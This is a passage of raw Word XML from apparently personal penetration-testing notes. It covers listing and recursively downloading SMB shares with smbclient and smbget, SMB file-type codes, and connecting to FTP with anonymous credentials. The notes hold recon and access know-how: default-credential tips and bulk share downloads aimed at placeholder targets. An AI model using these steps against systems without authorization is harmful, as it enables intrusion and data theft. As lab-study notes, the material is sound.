        </w:rPr>
        <w:t xml:space="preserve">Or  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient //TARGET_IP/SHARE_NAME -U username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this if you want to access as a specific user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001376">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you do this, it will ask for a password LATER, so no need to specify password here</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001377">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Often, when you try to access the anonymous share for example, it will ask for a password, and the password is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001378">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From there, do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls (or dir) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or any other commands to look around the share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001379">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000137A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download a specific file while inside SMB Share:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000137B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">get [file_name]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000137C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then it will download the file to the current working directory of your terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000137D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000137E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to recursively download a specific SMB Share:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000137F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="715"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbget -R smb://MACHINE_IP/SHARE_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001380">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="715"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbget -R -U username smb://MACHINE_IP/SHARE_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001381">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="715"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this if you want to download as a specific user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001382">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="715"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to run this command while IN your local machine, not while inside smb client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001383">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="715"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And once this runs, there should be new files/folders on your machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001384">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Types:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001385">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001386">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001387">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">D: Directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001388">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="723"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Represents a folder that contains files or other subdirectories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001389">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000138A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DR: Directory (Readable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000138B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1312"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Indicates a directory with readable permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000138C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000138D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DH: Directory (Hidden)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000138E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A hidden directory. These are often configuration or temporary directories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000138F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001390">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HR: Hidden File (Readable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001391">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A hidden file with read permissions. Hidden files often start with a dot (.) and are used for system or application settings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001392">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001393">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R: Regular File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001394">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A standard file, which could contain text, logs, or binary data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001395">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1184"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001396">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013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98">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y3fhc19e4hng" w:id="165"/>
      <w:bookmarkEnd w:id="165"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001399">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000139A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When accessing directories with spaces in the name, use double quotes and NOT single quotes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000139B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000139C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tips:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000139D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">anonymous as both the passwords and username sometimes works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000139E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1058"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see anything related to Ruby or "Ruby on Rails" when you look at FTP, look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId371">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MedJed</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39F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAUTION:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The FTP server may become unresponsive for up to 50 seconds after a port scan. Be patient and wait before attempting to connect.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to connect to ftp:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp 10.10.10.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="547"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You will be prompted for username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="547"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp [username]@192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to list files:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000013A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
